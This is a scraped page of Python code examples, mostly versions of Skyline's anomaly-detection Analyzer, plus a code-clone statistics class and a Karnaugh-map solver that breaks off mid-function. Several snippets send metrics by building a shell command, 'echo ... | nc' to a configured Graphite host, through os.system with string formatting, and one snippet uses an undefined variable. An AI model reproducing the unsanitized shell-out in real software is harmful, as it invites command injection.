                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                try:
                    algorithm_count_array = []
                    with open(algorithm_count_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_count_array.append(float_value)
                except:
                    algorithm_count_array = False

                if not algorithm_count_array:
                    continue

                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info(
                    'algorithm run count - %s run %s times' % (
                        algorithm, str(number_of_times_algorithm_run)))
                if number_of_times_algorithm_run == 0:
                    continue

                try:
                    algorithm_timings_array = []
                    with open(algorithm_timings_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_timings_array.append(float_value)
                except:
                    algorithm_timings_array = False

                if not algorithm_timings_array:
                    continue

                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info(
                    'algorithm timings count - %s has %s timings' % (
                        algorithm, str(number_of_algorithm_timings)))

                if number_of_algorithm_timings == 0:
                    continue

                try:
                    _sum_of_algorithm_timings = sum(algorithm_timings_array)
                except:
                    logger.error("sum error: " + traceback.format_exc())
                    _sum_of_algorithm_timings = round(0.0, 6)
                    logger.error('error - sum_of_algorithm_timings - %s' % (algorithm))
                    continue

                sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6)
                # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings))

                try:
                    _median_algorithm_timing = determine_median(algorithm_timings_array)
                except:
                    _median_algorithm_timing = round(0.0, 6)
                    logger.error('error - _median_algorithm_timing - %s' % (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)
                # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing))

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' % (
                        algorithm, sum_of_algorithm_timings,
                        median_algorithm_timing))
                send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.times_run'
                self.send_graphite_metric(send_mertic_name, '%d' % number_of_algorithm_timings)
                send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.total_time'
                self.send_graphite_metric(send_mertic_name, '%.6f' % sum_of_algorithm_timings)
                send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.median_time'
                self.send_graphite_metric(send_mertic_name, '%.6f' % median_algorithm_timing)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('run_time', '%.2f' % (time() - now))
            self.send_graphite_metric('total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values())))
            self.send_graphite_metric('total_anomalies', '%d' % len(self.anomalous_metrics))
            self.send_graphite_metric('total_metrics', '%d' % len(unique_metrics))
            for key, value in exceptions.items():
                send_metric = 'exceptions.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)
            for key, value in anomaly_breakdown.items():
                send_metric = 'anomaly_breakdown.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                self.send_graphite_metric('duration', '%.2f' % time_human)
                self.send_graphite_metric('projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            # if time() - now < 5:
            #    logger.info('sleeping due to low run time...')
            #    sleep(10)
            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340)
            # Etsy's original if this was a value of 5 seconds which does
            # not make skyline Analyzer very efficient in terms of installations
            # where 100s of 1000s of metrics are being analyzed.  This lead to
            # Analyzer running over several metrics multiple time in a minute
            # and always working.  Therefore this was changed from if you took
            # less than 5 seconds to run only then sleep.  This behaviour
            # resulted in Analyzer analysing a few 1000 metrics in 9 seconds and
            # then doing it again and again in a single minute.  Therefore the
            # ANALYZER_OPTIMUM_RUN_DURATION setting was added to allow this to
            # self optimise in cases where skyline is NOT deployed to analyze
            # 100s of 1000s of metrics.  This relates to optimising performance
            # for any deployments in the few 1000s and 60 second resolution
            # area, e.g. smaller and local deployments.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                # sleep_for = 60
                logger.info('sleeping for %.2f seconds due to low run time...' % sleep_for)
                sleep(sleep_for)
Ejemplo n.º 43
0
class SharedData(object):
    """
    Handles shared statistical data, which we want to collect over several
    executions of the ccdetection tool.
    Only shared values are used, so that multiple child processes 
    can manipulate them.
    """

    KEY_NODES   = "nodes_total"
    KEY_INPATH  = "in_path"
    KEY_CLONES  = "clones"
    KEY_COUNTER = "counter"
    KEY_QUERY_TIME = "query_time_total"
    KEY_FIRST_COUNTER = "first_query_counter"
    KEY_PROJECTS_COUNTER = "projects_counter"
    KEY_FIRST_QUERY_TIME = "first_query_time_total"

    def __init__(self, path, lock, in_path=None):
        """
        Setup all values to be shared (between processes) values.
        """
        self.lock = lock
        self.path = path
        
        if os.path.isfile(path):
            self.loadData()
            
        else:
            self.in_path = in_path
            self.clones = Manager().list()
            self.counter = Value("i", 0)
            self.nodes_total = Value("i", 0)            
            self.first_counter = Value("i", 0)
            self.query_time_total = Value("d", 0)
            self.projects_counter = Value("i", 0)
            self.first_query_time_total = Value("d", 0)
    
    def incProjectsCounter(self):
        """
        Increase the counter of projects analysed.
        """
        self.projects_counter.value += 1
    
    def addQuery(self, query_time, first=False):
        """
        Add the statistical data of a query that did not find a code clone.
        """
        if first:
            self.first_counter.value += 1
            self.first_query_time_total.value += query_time
             
        else:
            self.counter.value += 1
            self.query_time_total.value += query_time
            
    def addFoundCodeClone(self, code_clone_data, first=False):
        """
        Add the statistical data of a query that did find a code clone.
        """
        self.addQuery(code_clone_data.getQueryTime(), first)
        self.clones.append(code_clone_data)
        
    def loadData(self):
        with open(self.path, "rb") as fh:
            data = pickle.load(fh)
            
        # Restore state from load data.
        self.in_path = data[self.KEY_INPATH]
        self.clones  = Manager().list(data[self.KEY_CLONES])
        self.counter = Value("i", data[self.KEY_COUNTER])
        self.nodes_total = Value("i", data[self.KEY_NODES])
        self.first_counter = Value("i", data[self.KEY_FIRST_COUNTER])
        self.query_time_total = Value("d", data[self.KEY_QUERY_TIME])
        self.projects_counter = Value("i", data[self.KEY_PROJECTS_COUNTER])
        self.first_query_time_total = Value("d", data[self.KEY_FIRST_QUERY_TIME])
            
    def saveData(self, queries, code_clones):
        """
        Save the data of an analysed project to file.
        To avoid conflicts of multiple processes adding and saving data
        at the same time, we save all data atomically and using a lock, which
        prevents multiple executions at once.
        """
        self.lock.acquire()
        # Increase projects counter.
        self.incProjectsCounter()    
        
        
        # Add all query data.
        for query_dict in queries:
            self.addQuery(query_dict["query_time"], query_dict["first"])

        # Add all data from found code clones
        for clone_dict in code_clones:
            self.addFoundCodeClone(clone_dict["clone"], clone_dict["first"])
        
        self.saveToFile(self.path)
        
        self.lock.release()

    def __str__(self):
        try:
            avg_query_time_nofirst = (self.query_time_total.value/
                                      float(self.counter.value))
        except:
            avg_query_time_nofirst = 0
            
        try:
            avg_query_time = (
                    (self.query_time_total.value + self.first_query_time_total.value)/
                    float(self.counter.value + self.first_counter.value)
                    )
            
        except:
            avg_query_time = 0

        try:
            avg_first_query_time = (self.first_query_time_total.value/
                                    float(self.first_counter.value))
        except:
            avg_first_query_time = 0 
                    
        try:
            avg_nodes = self.nodes_total.value/float(self.counter.value)
        except:
            avg_nodes = 0
        
        data = (
            "Projects analysed: %d\n"
            "Total queries executed: %d\n"
            "Average query time: %fs\n"
            "Average query time (without first query): %fs\n"
            "Average query time (first query only): %fs\n"
            "Average number of nodes in AST: %f\n"
            "Code clones found: %d"
            ) % (
                self.projects_counter.value,
                self.counter.value + self.first_counter.value, avg_query_time,
                avg_query_time_nofirst,
                avg_first_query_time,
                avg_nodes, len(self.clones)
                )
            
        return data
    
    def combineWith(self, shared_data):
        self.lock.acquire() 
        
        # Add the data of shared_data to this file.
        self.in_path = shared_data.in_path
        self.nodes_total.value += shared_data.nodes_total.value
        
        for clone in shared_data.clones:
            self.clones.append(clone)
            
        self.counter.value += shared_data.counter.value
        self.query_time_total.value += shared_data.query_time_total.value 
        self.first_counter.value += shared_data.first_counter.value
        self.projects_counter.value += shared_data.projects_counter.value
        self.first_query_time_total.value += (
                                    shared_data.first_query_time_total.value
                                    )
        
        self.lock.release()
        
    def saveToFile(self, out_file):
        # Transform data to dictionary for easy pickling.
        data = {}
        data[self.KEY_INPATH] = self.in_path
        data[self.KEY_NODES]  = self.nodes_total.value
        data[self.KEY_CLONES] = []
        for clone in self.clones:
            data[self.KEY_CLONES].append(clone)
        data[self.KEY_COUNTER] = self.counter.value
        data[self.KEY_QUERY_TIME] = self.query_time_total.value 
        data[self.KEY_FIRST_COUNTER] = self.first_counter.value
        data[self.KEY_PROJECTS_COUNTER] = self.projects_counter.value
        data[self.KEY_FIRST_QUERY_TIME] = self.first_query_time_total.value
        
        # Save data to file.
        with open(out_file, "wb") as fh:
            pickle.dump(data, fh, pickle.HIGHEST_PROTOCOL)
    
    def getClones(self):
        clones = []
        for clone in self.clones:
            clones.append(clone)
            
        return clones
    
    def getProjectsCount(self):
        return self.projects_counter.value

    def getInPath(self):
        return self.in_path
    
    def setInPath(self, path):
        self.in_path = path
Ejemplo n.º 44
0
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.ring = RedisRing(settings.REDIS_BACKENDS)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        process_key = '.'.join(['skyline','analyzer', socket.gethostname(), str(i)])
        alive_key = '.'.join([process_key, 'alive'])
        self.ring.run('set', alive_key, 1)
        self.ring.run('expire', alive_key, 30)
        """
        Assign a bunch of metrics for a process to analyze.
        """
        processes = list(self.ring.run('zrange', settings.ANALYZER_PROCESS_KEY, 0, -1))
        for key in processes:
            value = self.ring.run('get', key)
            if not value:
                self.ring.run('zrem', settings.ANALYZER_PROCESS_KEY, 0, key)

        # Add current process to index and determine position
        if not self.ring.run('zscore', settings.ANALYZER_PROCESS_KEY, alive_key):
            self.ring.run('zadd', settings.ANALYZER_PROCESS_KEY, time(), alive_key)
        self.ring.run('expire', settings.ANALYZER_PROCESS_KEY, 60)
        process_position = self.ring.run('zrank', settings.ANALYZER_PROCESS_KEY, alive_key) + 1
        process_count = self.ring.run('zcard', settings.ANALYZER_PROCESS_KEY)

        # If there are less processes then we know are going to be running assume
        # the others will start
        if process_count < settings.ANALYZER_PROCESSES:
            process_count = settings.ANALYZER_PROCESSES

        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(process_count)))
        if process_position == process_count:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = process_position * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.ring.run('mget', assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # if anomalies detected Pack and Write anomoly data to Redis
        if len(anomalous_metrics) > 0:
            packed = Packer().pack(anomalous_metrics)
            self.ring.run('set', process_key, packed)
            # expire the key in 30s so anomalys don't show up for too long
            self.ring.run('expire', process_key, 30)
            self.ring.run('sadd', settings.ANALYZER_ANOMALY_KEY, process_key)
            # expire the key in 60s so anomalys don't show up for too long
            self.ring.run('expire', settings.ANALYZER_ANOMALY_KEY, 60)

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                if key not in self.anomaly_breakdown:
                    self.anomaly_breakdown[key] = value
                else:
        	        self.anomaly_breakdown[key] += value

            for key, value in exceptions.items():
                if key not in self.exceptions:
                    self.exceptions[key] = value
                else:
        	        self.exceptions[key] += value

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process intializes.
        """
        while 1:
            now = time()
            # Make sure Redis is up
            try:
                self.ring.check_connections()
            except:
                sleep(10)
                self.ring = RedisRing(settings.REDIS_BACKENDS)
                continue

            # Discover unique metrics
            unique_metrics = list(self.ring.run('smembers', settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        if alert[0] in metric[1]:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.ring.run('get', cache_key)
                                if not last_alert:
                                    self.ring.run('setex', cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric)

                            except Exception as e:
                                logger.error("couldn't send alert: %s" % e)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))
                system('echo skyline.analyzer.total_analyzed %d %s | nc -w 3 %s 2003' % ((len(unique_metrics) - sum(exceptions.values())), now, host))

            # Check canary metric
            raw_series = self.ring.run('get', settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                if settings.GRAPHITE_HOST != '':
                    host = settings.GRAPHITE_HOST.replace('http://', '')
                    system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                    system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
Ejemplo n.º 45
0
class Analyzer(Thread):
    def __init__(self, parent_pid, storage):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.lock = Lock()
        self.exceptions = Manager().dict()
        self.anomaly_breakdown = Manager().dict()
        self.anomalous_metrics = Manager().list()
        self.storage = storage
        self.alerter = Alerter(storage)

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint, ts = run_selected_algorithm(timeseries)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name, ts]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except AttributeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                if key not in self.anomaly_breakdown:
                    self.anomaly_breakdown[key] = value
                else:
        	        self.anomaly_breakdown[key] += value

            for key, value in exceptions.items():
                if key not in self.exceptions:
                    self.exceptions[key] = value
                else:
        	        self.exceptions[key] += value

    def send_mail(self, alert, metric):
        """
        Send an alert email to the appropriate recipient
        """
        msg = MIMEMultipart('alternative')
        msg['Subject'] = '[skyline alert] ' + metric[1]
        msg['From'] = settings.ALERT_SENDER
        msg['To'] = alert[1]
        link = '%s/render/?width=588&height=308&target=%s' % (settings.GRAPHITE_HOST, metric[1])
        body = 'Anomalous value: %s <br> Next alert in: %s seconds <a href="%s"><img src="%s"/></a>' % (metric[0], alert[2], link, link)
        msg.attach(MIMEText(body, 'html'))
        s = SMTP('127.0.0.1')
        s.sendmail(settings.ALERT_SENDER, alert[1], msg.as_string())
        s.quit()

    def run(self):
        """
        Called when the process intializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Send alerts
            #if settings.ENABLE_ALERTS:
            #    for alert in settings.ALERTS:
            #        for metric in self.anomalous_metrics:
            #            if alert[0] in metric[1]:
            #                try:
            #                    last_alert = self.redis_conn.get('last_alert.' + metric[1])
            #                    if not last_alert:
            #                        self.redis_conn.setex('last_alert.' + metric[1], alert[2], packb(metric[0]))
            #                        self.send_mail(alert, metric)
            #                except Exception as e:
            #                    logger.error("couldn't send alert: %s" % e)

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname( __file__ ), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                anomalous_metrics = list(self.anomalous_metrics)
                anomalous_metrics.sort(key=operator.itemgetter(1))
                fh.write('handle_data(%s)' % anomalous_metrics)
            
            # process anomalous metrics
            for metric in self.anomalous_metrics:
                try:
                    last_save_key = 'last_save.%s.%s' % (metric[1], metric[2])
                    last_save = self.redis_conn.get(last_save_key)
                    if not last_save:
                        self.redis_conn.setex(last_save_key,
                            settings.SKIP_FREQUENCY, packb(metric[0]))
                        self.storage.save(metric)
                    if settings.ENABLE_ALERTS:
                        last_alert_key = 'last_alert.' + metric[1]
                        last_alert = self.redis_conn.get(last_alert_key)
                        if not last_alert:
                            self.redis_conn.setex(last_alert_key,
                                settings.SKIP_FREQUENCY, packb(metric[0]))
                            self.alerter.add(metric)
                except Exception as e:
                    logger.error("Failed processing anomaly, pid: %s, metric: %s, error: %s",
                        getpid(), metric[1], e)
            
            # send ready alerts
            if settings.ENABLE_ALERTS:
                try:
                    self.alerter.send_alerts()
                except Exception as e:
                    logger.error("Failed sending alerts, error: %s", e)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(self.exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % self.exceptions)
            logger.info('anomaly breakdown :: %s' % self.anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))
                system('echo skyline.analyzer.total_analyzed %d %s | nc -w 3 %s 2003' % ((len(unique_metrics) - sum(self.exceptions.values())), now, host))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                if settings.GRAPHITE_HOST != '':
                    host = settings.GRAPHITE_HOST.replace('http://', '')
                    system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                    system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))


            # Reset counters
            self.anomalous_metrics[:] = []
            self.exceptions = Manager().dict()
            self.anomaly_breakdown = Manager().dict()

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
Ejemplo n.º 46
0
class KarnaughMap(object):

    def __init__(self, n, MaxProcess=16384):

        #self.blocks = Manager().list()
        self.blocks = []
        self.kmap = {}
        self.kmapDCare = {}
        self.kmapValues = {}

        self.MaxProcess = MaxProcess
        print "MaxProcess %d" % MaxProcess
        self.completion = 0
        # Set number of variables
        self.numberOfVariables=n
        self.numberOfDCares=0
        # Determine width and height from n. of vars
        self.width=int(pow(2, ceil(n/2.0)))
        self.height=int(pow(2, floor(n/2.0)))

        # Fill map with 0s and clear the list of KarnaughNodes
        self.Reset()

        # Fill map kmapValues with values that each cell in the map
        # has. Look here for rules:
        # http:#www.allaboutcircuits.com/vol_4/chpt_8/3.html
        if(self.numberOfVariables>2):
            for i in range(0,self.height):
                for j in range(0,self.width):
                    if(i%2 ==0 ):
                        self.kmapValues[(j, i)]=self.GrayEncode(j+((i)*self.width))
                    else:
                        self.kmapValues[(j, i)]=self.GrayEncode(self.width-1-j+((i)*self.width))
        else:
            if(self.numberOfVariables==2):

                self.kmapValues[(0, 0)]=0
                self.kmapValues[(1, 0)]=1
                self.kmapValues[(0, 1)]=2
                self.kmapValues[(1, 1)]=3

            if(self.numberOfVariables==1):

                self.kmapValues[(0, 0)]=0
                self.kmapValues[(1, 0)]=1




    def Reset(self):

        """ Fills map with zeros and deletes all nodes from the solution list """

        for i in range(0,self.height):
            for j in range(0,self.width):
                self.Set(j, i, 0 )
    	self.blocks=Manager().list()


    def Solve(self, completion):

        """ Iterates through all possible ways that 'Don't cares' can be
        arranged, and finds one with fewest number of nodes in the solution
        (bestc). If there are more ways that give the same number of nodes
        in the solution choose the one with biggest nodes (bestsc) """

        best = []
        bestc=-1
        bestsc=0
        #for i in range(0, int(pow(2.0, self.numberOfDCares )) ):
        for i in range(0, 1 ):

            b = []
            j=i
            while(j>0):

                b.insert(0, (j%2) )
                j=j/2

            for j in range(len(b), self.numberOfDCares):
                b.insert(0, 0 )

            #self.blocks= Manager().list()
            self.blocks= []

            c=0
            for k in range(0, self.height):

                for l in range(0, self.width):

                    if(self.kmapDCare[(l, k)]==1):

                        self.kmap[(l, k)]=1
                        #if(b[c]==1):
                        #    self.kmap[(l, k)]=1
                        #else:
                        #     self.kmap[(l, k)]=0;
                        c += 1




            self.Solve2( completion )

            if( (bestc==-1) | (len(self.blocks)<=bestc) ):

                sc=0
                for iter in self.blocks:

                    for k in range(0,len(iter.values) ):
                        if(iter.values[k]==2):
                            sc += 1


                if( (bestc==-1) | (len(self.blocks)<bestc) ):

                    best=self.blocks
                    bestc=len(best)
                    bestsc=sc

                else:

                    if( sc>bestsc ):

                        best=self.blocks
                        bestc=len(best)
                        bestsc=sc




        self.blocks=best


    def Solve2(self, completion):

        def Join(a,i):
            CompBlocks = [block for block in blocks if self.IsJoinable(a.values, block.values )]
            for b in CompBlocks:
                x=self.IsJoinable(a.values, b.values )
                if(x>0):
                    #/* If they can be joined make a new block with 2 in the place
                    #of the one bit where they a and b are different */
                    n = KarnaughNode()
                    n.numberOfItems=a.numberOfItems*2
                    n.flag = False
                    for j in range(0, len(a.values) ):

                        if(j!=(x-1)):
                            n.values.append(a.values[j] )
                        else:
                            n.values.append( 2 )

                    #/* Mark that a node is part of a larger node */
                    a.flag=True
                    b.flag=True

                    #/* Check if that block already exists in the list */
                    exist=False
                    for c in self.blocks:
                        if(n.values==c.values):
                            exist=True

                    if(not exist):
                        self.blocks.append(n )
        def CleanProcess():
            for process in ProcessList:
                process.join()

            for process in ProcessList:
                jn = resultQueue.get()
                for n in jn.newblocks:
                    exist = False
                    for c in self.blocks:
                        if(n.values==c.values):
                            exist=True
                    if(not exist):
                        self.blocks.append(n )
                for b in jn.removeblocks:
                    for c in self.blocks:
                        if(b.values==c.values):
                            self.blocks.remove(c)

        """ Check for special case that all cells in the map are the same """
        a=1
        for i in range(0,self.height):
            if(a==0):
                break
            for j in range(0,self.width):
                if( self.kmap[(j, i)]!=self.kmap[(0, 0)] ):
                    a=0
                    break
        if(a==1):

            #/* Clear the list so that all those nodes with one item are deleted */
            #self.blocks=Manager().list()
            self.blocks=[]

            # If there are only zeros in the map there's nothing to solve
            if (self.kmap[(0, 0)]==0):
                 return
            else:

                # If there are only ones, solution is one element as big as the map
                n=KarnaughNode()
                n.numberOfItems = self.width*self.height
                for j in range(0,self.numberOfVariables):
                    n.values.append( 2 )
                self.blocks.append(n )
                return



        #/* Put all blocks with 1 element in list */
        for i in range(0, self.height):

            for j in range(0, self.width):

                if(self.kmap[(j, i)]==1):

                    n=KarnaughNode()
                    n.numberOfItems=1
                    n.flag=False
                    n.values=self.GetMapBoolValue(j, i )
                    self.blocks.append(n )


        max = int(log(self.width*self.height )/log(2)+1)

        # Joining blocks into blocks with 2^i elements

        for sizeloop in range( 1, max ):
            #/* Check every block with every other block and see if they can be joined
            #into a bigger block */

            blocks = [block for block in self.blocks if (block.numberOfItems == pow(2.0, sizeloop-1)) ]
##            resultQueue = Queue()
            ProcessList = []
